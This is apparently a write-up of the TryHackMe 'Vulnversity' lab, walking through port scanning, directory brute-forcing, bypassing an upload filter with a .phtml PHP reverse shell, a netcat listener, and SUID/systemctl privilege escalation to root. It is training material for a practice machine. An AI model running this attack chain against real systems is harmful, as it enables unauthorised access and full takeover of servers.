Vulnversity
Learn about active recon, web app attacks and privilege escalation.
Scan the open ports
nmap 10.10.64.159 -p1-65535 --open -T5 -n -oG openPorts.txt
nmap: command, stands for Network Mapper
10.10.64.159: target host IP
-p1-65535: port range to scan, is like -p-
--open: port status, report only open ports
-T5: fast scan but more intrusive, on the other hand -T0 is slower but less intrusive
-n: skip DNS resolution, it’s faster
-oG fileName: grepable output exported to fileName. It is a simple format that lists each host on one line and can be trivially searched and parsed with standard Unix tools such as grep, awk, cut, sed, diff
nmap 10.10.64.159 -p1-65535 --open -sS --min-rate 4000 -vvv -n -Pn -oG ports2.txt -sS: SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a non-listener. If no response is received after several retransmissions, the port is marked as filtered. The port is also marked filtered if an ICMP unreachable error (type 3, code 0, 1, 2, 3, 9, 10, or 13) is received. The port is also considered open if a SYN packet (without the ACK flag) is received in response. This can be due to an extremely rare TCP feature known as a simultaneous open or split handshake connection (see https://nmap.org/misc/split-handshake.pdf).
-sU: UDP Scan
-v: verbose, show in the output ports discovered, otherwise you have to wait until the end of the scan
--min-rate: When the --min-rate option is given Nmap will do its best to send packets as fast as or faster than the given rate. The argument is a positive real number representing a packet rate in packets per second. For example, specifying --min-rate 300 means that Nmap will try to keep the sending rate at or above 300 packets per second. Specifying a minimum rate does not keep Nmap from going faster if conditions warrant.
-Pn (No ping): skips the host discovery stage altogether
This option skips the host discovery stage altogether. Normally, Nmap uses this stage to determine active machines for heavier scanning and to gauge the speed of the network. By default, Nmap only performs heavy probing such as port scans, version detection, or OS detection against hosts that are found to be up. Disabling host discovery with -Pn causes Nmap to attempt the requested scanning functions against every target IP address specified. So if a /16 sized network is specified on the command line, all 65,536 IP addresses are scanned. Proper host discovery is skipped as with the list scan, but instead of stopping and printing the target list, Nmap continues to perform requested functions as if each target IP is active. Default timing parameters are used, which may result in slower scans. To skip host discovery and port scan, while still allowing NSE to run, use the two options -Pn -sn together.
For machines on a local ethernet network, ARP scanning will still be performed (unless --disable-arp-ping or --send-ip is specified) because Nmap needs MAC addresses to further scan target hosts. In previous versions of Nmap, -Pn was -P0 and -PN.
Enumerate services running; let’s see what is behind the open ports
nmap 10.10.64.159 -sC -sV -p21,22,139,445,3128,3333 -oN target.txt
-sV: Probe open ports to determine service/version info
-sC: Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
-p : Only scan specified ports; For example: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports : Exclude the specified ports from scanning
-oN (normal output): Write output in Nmap's normal format to . This format is roughly the same as the standard interactive output printed by Nmap at runtime
Identify technologies used by the website.
whatweb http://10.10.64.159:3333
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account ID's, web framework modules, SQL errors, and more.
Identify and fingerprint Web Application Firewall products
wafw00f http://10.10.64.159:3333/
wafw00f Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is active>
The server has no web application firewall
Let’s see the webpage: browser > ip:port
Don’t forget to add time to the machine’s deployment on the TryHackMe website
Now we can enumerate directories on the web server
https://github.com/OJ/gobuster
gobuster dir -u http://10.10.64.159:3333/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Gobuster is a tool used to brute-force:
URLs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets
dir: Uses directory/file enumeration mode
-u: target URL
-w: path to wordlist / dictionary to perform the bruteforce attack
-t, --threads int: Number of concurrent threads (default 10)
Gobuster doesn’t do recursive brute force, It’s written in Go, a good language to work with sockets and connections, faster than an interpreted script (such as Python)
We find the internal/ subdirectory and the uploads/ subdirectory
Parrot OS already has reverse-shells but we could download a new one from the internet
http://pentestmonkey.net/tools/php-reverse-shell
Let’s try to upload a .php payload to the server
The .php extension is not allowed
We have to know which type of extensions we are allowed to upload, in order to do that, we can use Burpsuite tool, but first we have to set up a proxy configuration for burpsuite to be able to intercept the request, we can use FoxyProxy or use a manual configuration on the browser
Mozilla > Preferences > General > Network Settings > Settings
Once we are done using Burpsuite, we can stop using the proxy by configuring “no proxy” on Mozilla browser
If we try to enter google we are going to get a Certificate error, to solve it, we go to our proxy web http://127.0.0.1:8080/, and click on CA Certificate, and save the file
Mozilla > Preferences > Privacy and Security > Security > Certificates > View Certificates
Import the downloaded cert
Trust this CA, ok, ok
Now we will not have any certificate error when using Burpsuite
Open burpsuite to fuzz the upload form and see what file type is allowed in order to upload our payload
Open Burpsuite with the proxy active
Use Burp Defaults, Start Burpsuite, turn on Interception
Burpsuite > Proxy > Intercept > click Intercept is off
Try to submit the php reverse shell payload to the server again, this time burpsuite intercepts the request, as soon as we click submit, the webpage will be loading and Burpsuite pops up with our request
Right click, send to intruder, used for automating customised attacks
Tab Intruder > Positions, click on “Clear” on the right
Select the "Sniper" attack type.
We are going to make a kind of bruteforce attack to see what file extensions are allowed
Select on filename line the extension of our file, .php, and click on Add on the right
Now we get the wildcard symbol on the chain, burpsuite will change this part of the chain with each word in the dictionary to find out which extension is allowed
This way we are indicating burpsuite where to change the chain with the words in a dictionary to perform the bruteforce attack
Here we can download wordlists: https://github.com/danielmiessler/SecLists
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-extensions-lowercase.txt
Download the dictionary directly with the terminal in the raw version on github
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-small-extensions-lowercase.txt
Now we go to BurpSuite > tab Intruder > Payloads, here we configure the attack and select the dictionary / wordlist, in payload options load the wordlist
And open “raft-small-extensions-lowercase.txt” which is a wordlist that contains file extension names
Uncheck the option URL encode
Click Start attack at the top right on the BurpSuite graphical interface in orange colour
BurpSuite is trying combinations
We see that for the .phtml extension the Length is different, .phtml is allowed
Now we are done using Burpsuite, so we can close it and stop using Proxy on the Mozilla settings
We see that the .phtml extension is allowed
Change the payload extension from php to phtml
cp /usr/share/webshells/php/php-reverse-shell.php /home/roberto/Downloads/php-reverse-shell.phtml
Now we have to make the payload connect to us, so we have to add our IP address and a port number, we can use the port 443, that port is usually allowed by the firewall, and the IP address is the tun0 interface address
nano /home/Roberto/Downloads/php-reverse-shell.phtml 
Upload the payload
We see we can upload the reverse shell with the .phtml extension
Now we have to listen on that port, the 443 port, that we indicated on the payload’s code
netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol
-l: listen mode, for inbound connects
-v: verbose, gives information on the output [use twice to be more verbose]
-n: numeric-only IP addresses, no DNS
-p port: local port number (port numbers can be individual or ranges: lo-hi [inclusive])
And on the web server click php-reverse-shell.phtml , for the payload to execute the reverse connection to us
A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections and control the remote server when the connection gets established
The reverse shell payload has code to make this possible
As soon as we click we get the connection
We are now on the remote server with the www-data user
But this TTY is not fully functional yet...
Make the TTY fully interactive
fg (enter)
(enter)
If we open nano we see the wrong proportions
Set the right proportions, open a new terminal in our system
And we can set how many rows and columns we are using
If we open the nano text editor now we see that we have the right proportions
Now we got a fully interactive TTY and the arrow keys are functional and the proportions are right
With the user that we got inside the machine, www-data, we can access some parts of the system
And we see the user.txt flag
Now we have to get root access, privilege escalation, on this linux machine, we are going to exploit SUID binaries in order to get maximum access, let’s see what binaries are there that have SUID permissions
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.
find / -perm -4000 2>/dev/null
This website https://gtfobins.github.io/ has a list of binaries and how to use them to do the privilege escalation to get permissions; we are going to search this binaries from the list above to see if any of them can be exploited
For the sudo command we don’t see any result
But we find something with systemctl
The website has even an explanation
We are going to set SUID permissions on the bash
We can copy and edit the vulnerability code
But change the command and the binary
Once the code has been edited, we can execute it and see that /bin/bash now has SUID permissions
bash -p and we see we have root permissions, we’ve escalated privileges
We list the directories, and we find the root.txt flag
We check the root flag is correct
And we have finished this machine
We are done!
Now on TryHackMe we have some questions
